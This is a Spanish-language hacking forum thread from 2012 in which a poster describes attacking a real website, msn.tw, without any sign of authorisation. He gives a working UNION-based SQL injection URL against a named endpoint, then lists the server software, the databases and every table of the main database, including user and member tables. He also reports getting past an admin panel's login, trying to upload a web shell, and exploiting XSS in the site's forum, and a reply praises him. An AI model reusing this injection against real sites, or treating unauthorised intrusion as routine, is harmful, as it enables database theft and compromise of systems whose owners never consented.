Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: MaztoR en Julio 07, 2012, 03:23:28 AM

Título: MSN Taiwan [SQLI , BYPASS y XSS]
Publicado por: MaztoR en Julio 07, 2012, 03:23:28 AM
Bueno, por hay con un bro de ddlr nos pusimos a intentar el ingreso a MSN.TW de la cual es ironico que tenga un directorio tan mugre y a la vez usando PHP y MYSQL , sin embargo decidimos explorar mas debido a que es muy llamativo todo este escenario.
Msn.tw

(http://3.bp.blogspot.com/-T_Sw8AkHVm4/T8B-EffrhYI/AAAAAAAAAIQ/htt3yNRzJZs/s200/fffsdsfda.PNG)


Iniciamos asi:
http://www.msn.tw/softball/gamedetail.php?gameseq=218+and+1=0+union+select+version%28%29,1,2,3,4,5,6,7,8,9,10,11--  (http://www.msn.tw/softball/gamedetail.php?gameseq=218+and+1=0+union+select+version%28%29,1,2,3,4,5,6,7,8,9,10,11--)

(http://4.bp.blogspot.com/-IM5wm8d996Q/T8B-d3lCFvI/AAAAAAAAAIo/uSDBFPnAxuM/s1600/vers.PNG)

De hay comenzamos a sacar la data...
Info basica

Apache
PHP/5.2.13
PleskLin
MySQL >=5
5.0.90

Dbs's:

information_schema
msn
test

Db Principal:

accesslog
album
board
forum
game
lotto_539
mem
open_account
open_article
open_article_content
open_article_content_d
open_board
open_collect
open_keyword
open_tracking
open_violate
photo
record
record_2005
record_2006
record_2007
record_2009
record_2010
record_2011
record_2012
redir_conf
reserve
static
static_2005
static_2006
static_2007
static_2009
static_2010
static_2011
static_2012
team
user
webcont
-----------------------------------------------------------------------------------
Despues de realizar todo esto dieron ganas de subir shell, pero no logre el objetivo, intente en paneles loguearme y logre pero nada interesante aunqu cabe aclarar que no era necesario sacar user debido a que el panel tenia bypasse.. el Uploader no servia de mucho que digamos.

PANEL CON BYPASSE

(http://3.bp.blogspot.com/-q-GoOJo3-DI/T8B-s8k9htI/AAAAAAAAAI0/-Nwya3I2MYc/s200/Cafsfaptafsafsura.PNG)

Aburrido solo me puse a explotar XSS en el foro...
http://www.msn.tw/softball/forum.php (http://www.msn.tw/softball/forum.php)


(http://3.bp.blogspot.com/-cCIU_ynJOaA/T8B-3EtAOpI/AAAAAAAAAJA/UVhL1ncin3g/s200/rewrea.PNG)

Apoyo
---------------------------------
Black-Mantic Blaron , 5TU4RT
Título: Re:MSN Taiwan [SQLI , BYPASS y XSS]
Publicado por: Dedalo en Julio 08, 2012, 01:13:38 PM
Si lo había visto en tu blog... todo un atacante xD aunque lo veo no creo como msn puede tener una web asi...


Saludos,
Dedalo